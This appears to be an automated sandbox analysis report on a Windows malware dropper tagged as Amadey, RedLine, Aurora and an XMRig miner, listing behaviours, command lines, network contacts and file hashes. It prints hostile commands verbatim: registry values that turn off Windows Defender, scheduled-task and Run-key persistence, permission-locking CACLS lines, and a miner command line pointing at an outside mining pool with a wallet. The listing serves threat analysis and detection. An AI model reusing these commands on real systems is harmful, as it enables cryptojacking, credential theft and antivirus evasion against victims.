Analysis Overview
SHA256
2e60629f733770a4c9aa310207861db491ddc44eb25c1f199ca8430519c9c5ab
Threat Level: Known bad
The file 2e60629f733770a4c9aa310207861db491ddc44eb25c1f199ca8430519c9c5ab was found to be: Known bad.
Malicious Activity Summary
xmrig
Aurora
Amadey
RedLine payload
Modifies Windows Defender Real-time Protection settings
RedLine
XMRig Miner payload
Downloads MZ/PE file
Checks computer location settings
Loads dropped DLL
Executes dropped EXE
Reads user/profile data of web browsers
Windows security modification
Adds Run key to start application
Checks installed software on the system
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of SetThreadContext
Program crash
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Creates scheduled task(s)
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious behavior: LoadsDriver
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-02-25 00:31
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-02-25 00:31
Reported
2023-02-25 00:34
Platform
win10v2004-20230221-en
Max time kernel
145s
Max time network
138s
Command Line
Signatures
Amadey
Aurora
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iDY25ek.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iDY25ek.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mjf15Td.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mjf15Td.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mjf15Td.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iDY25ek.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iDY25ek.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iDY25ek.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mjf15Td.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mjf15Td.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iDY25ek.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mjf15Td.exe | N/A |
RedLine
RedLine payload
xmrig
XMRig Miner payload
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1000021001\lebro.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\rEP98nA39.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Reads user/profile data of web browsers
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iDY25ek.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mjf15Td.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mjf15Td.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\2e60629f733770a4c9aa310207861db491ddc44eb25c1f199ca8430519c9c5ab.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\2e60629f733770a4c9aa310207861db491ddc44eb25c1f199ca8430519c9c5ab.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sMX03nw11.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sMX03nw11.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sMV95dq31.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sjb26NW37.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sjb26NW37.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\1000020051\prima.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\prima.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000020051\\prima.exe" | C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sMV95dq31.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\1000020051\prima.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Hedtgoupb.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Hedtgoupb.exe\"" | C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe | N/A |
Checks installed software on the system
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2220 set thread context of 4268 | N/A | C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe |
Enumerates physical storage devices
Program crash
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iDY25ek.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\knY67cE.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mjf15Td.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\nay67WA12.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ele75NW24.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\2e60629f733770a4c9aa310207861db491ddc44eb25c1f199ca8430519c9c5ab.exe
"C:\Users\Admin\AppData\Local\Temp\2e60629f733770a4c9aa310207861db491ddc44eb25c1f199ca8430519c9c5ab.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sMX03nw11.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sMX03nw11.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sMV95dq31.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sMV95dq31.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sjb26NW37.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sjb26NW37.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iDY25ek.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iDY25ek.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\knY67cE.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\knY67cE.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2972 -ip 2972
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2972 -s 2036
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mjf15Td.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mjf15Td.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4268 -ip 4268
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4268 -s 1088
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\nay67WA12.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\nay67WA12.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1576 -ip 1576
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1576 -s 1576
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\rEP98nA39.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\rEP98nA39.exe
C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe
"C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe" /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "Admin:N"&&CACLS "mnolyk.exe" /P "Admin:R" /E&&echo Y|CACLS "..\4f9dd6f8a7" /P "Admin:N"&&CACLS "..\4f9dd6f8a7" /P "Admin:R" /E&&Exit
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "mnolyk.exe" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "mnolyk.exe" /P "Admin:R" /E
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\4f9dd6f8a7" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\4f9dd6f8a7" /P "Admin:R" /E
C:\Users\Admin\AppData\Local\Temp\1000020051\prima.exe
"C:\Users\Admin\AppData\Local\Temp\1000020051\prima.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ele75NW24.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ele75NW24.exe
C:\Users\Admin\AppData\Local\Temp\1000021001\lebro.exe
"C:\Users\Admin\AppData\Local\Temp\1000021001\lebro.exe"
C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe
"C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe" /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\9e0894bcc4" /P "Admin:N"&&CACLS "..\9e0894bcc4" /P "Admin:R" /E&&Exit
C:\Windows\SysWOW64\cacls.exe
CACLS "nbveek.exe" /P "Admin:N"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "nbveek.exe" /P "Admin:R" /E
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\9e0894bcc4" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\9e0894bcc4" /P "Admin:R" /E
C:\Users\Admin\AppData\Local\Temp\1000279001\bin.exe
"C:\Users\Admin\AppData\Local\Temp\1000279001\bin.exe"
C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe
"C:\Users\Admin\AppData\Local\Temp\1000280001\Hedtgoupb.exe"
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic os get Caption
C:\Windows\SysWOW64\cmd.exe
cmd /C "wmic path win32_VideoController get name"
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\SysWOW64\cmd.exe
cmd /C "wmic cpu get name"
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic cpu get name
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1720 -ip 1720
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1720 -s 1308
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\njt68oM72.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\njt68oM72.exe
C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe
C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe
C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe
C:\Users\Admin\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr.2miners.com:2222 -u 42iqvxeZwhYZGrYzGc44d3fv9Aq6TQ5jLbULdoHwfUd3Cnw6Ji2NC8G2LMxr6SwWTDGbrQs5rPXLk5odWxxnuj13K7yPrKZ.RIG1 -p X --algo rx/0 --cpu-max-threads-hint=50
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 588 -p 2776 -ip 2776
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2776 -s 644
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 199.176.139.52.in-addr.arpa | udp |
| DE | 193.233.20.23:4124 | | tcp |
| US | 8.8.8.8:53 | 23.20.233.193.in-addr.arpa | udp |
| US | 20.189.173.4:443 | | tcp |
| DE | 193.233.20.23:4124 | | tcp |
| NL | 173.223.113.164:443 | | tcp |
| NL | 173.223.113.131:80 | | tcp |
| US | 204.79.197.203:80 | | tcp |
| DE | 193.233.20.15:80 | 193.233.20.15 | tcp |
| DE | 193.233.20.19:80 | 193.233.20.19 | tcp |
| US | 8.8.8.8:53 | 15.20.233.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.20.233.193.in-addr.arpa | udp |
| RU | 62.204.41.245:80 | 62.204.41.245 | tcp |
| US | 8.8.8.8:53 | 245.41.204.62.in-addr.arpa | udp |
| RU | 62.204.41.88:80 | 62.204.41.88 | tcp |
| NL | 185.246.221.126:80 | 185.246.221.126 | tcp |
| US | 8.8.8.8:53 | 88.41.204.62.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.221.246.185.in-addr.arpa | udp |
| US | 93.184.221.240:80 | | tcp |
| NL | 45.15.159.15:80 | 45.15.159.15 | tcp |
| NL | 212.87.204.93:8081 | | tcp |
| US | 8.8.8.8:53 | 15.159.15.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.204.87.212.in-addr.arpa | udp |
| DE | 193.233.20.23:4124 | | tcp |
| DE | 193.233.20.23:4124 | | tcp |
| US | 8.8.8.8:53 | 62.13.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xiaoxiaojue.duckdns.org | udp |
| NL | 212.87.204.245:55215 | xiaoxiaojue.duckdns.org | tcp |
| US | 8.8.8.8:53 | 245.204.87.212.in-addr.arpa | udp |
| US | 8.8.8.8:53 | transfer.sh | udp |
| DE | 144.76.136.153:443 | transfer.sh | tcp |
| US | 8.8.8.8:53 | 153.136.76.144.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xmr.2miners.com | udp |
| DE | 162.19.139.184:2222 | xmr.2miners.com | tcp |
| US | 8.8.8.8:53 | 184.139.19.162.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sMX03nw11.exe
| MD5 | 11f2b1309186601a9e544fc34de193d9 |
| SHA1 | 328bcf6f4fbc69230bd22bf85977da1669a0b608 |
| SHA256 | 3aae52a5d31bb9bf230c24b47212fa5aaae3cc3d1de51df986caab2f62b8de84 |
| SHA512 | 081803e9d679e140399ee2059bac5124bc1dbd7e2dae38a61934bc0d1089ceb50482525d61f1e6fada9e20b3233a9c00d4c8f0929d9faf7a783dfcd198798a59 |
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sMV95dq31.exe
| MD5 | e0935620bcbdbcdf546de1acb162c966 |
| SHA1 | 93597de92a80a54575cf6f8660582fe48f9d759f |
| SHA256 | ef122f1d51a2a85b60b4c702f3de91e0c7f7fd3033dd1d905b5d4b82721af5eb |
| SHA512 | 112be204a4bf6bf079c57800460ae34535558e7fd08215b1a9510b9c267bad2c6a3f55e9973d94bb9e2afca7d5bb644b11d54f2d335e1b12ee3eb5592ab848c0 |
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sjb26NW37.exe
| MD5 | 4fd40d5b5664dbd8b16c907294093901 |
| SHA1 | 88adced8cb29b5ad8b175b5f3014fe83038645e1 |
| SHA256 | e7e51349dcc857b7c13d17c2508cda7d7afd6885a2837390886f87d34909d8bc |
| SHA512 | ba51014fdc6a5841d5283e11fa14e1e2cca83b86a7815e4abe5445060e2c3e873f4749955df46fdab97448d80f6c18164d1df0ff1b4e14ec595f70284371a011 |
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iDY25ek.exe
| MD5 | 1c7d69dfd510a45c3484b7b3b4ca3052 |
| SHA1 | ff871195c8284ef849b9e4eca71daeaf3409f942 |
| SHA256 | 8009f66849a5b168538c039a36ff2bd95afcbe20ba3fae7c78b55e79a9510347 |
| SHA512 | c86c1151e563900637a39a1cb440c0ddf5601b399d0a8326eacd163645ddbe919d40b6ade5e2e5d7a4462b7172995c536f8555a4adad0ff14f233c13446c94ee |
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\knY67cE.exe
| MD5 | a6adc2e80b48f93ba7b7a58f2465d794 |
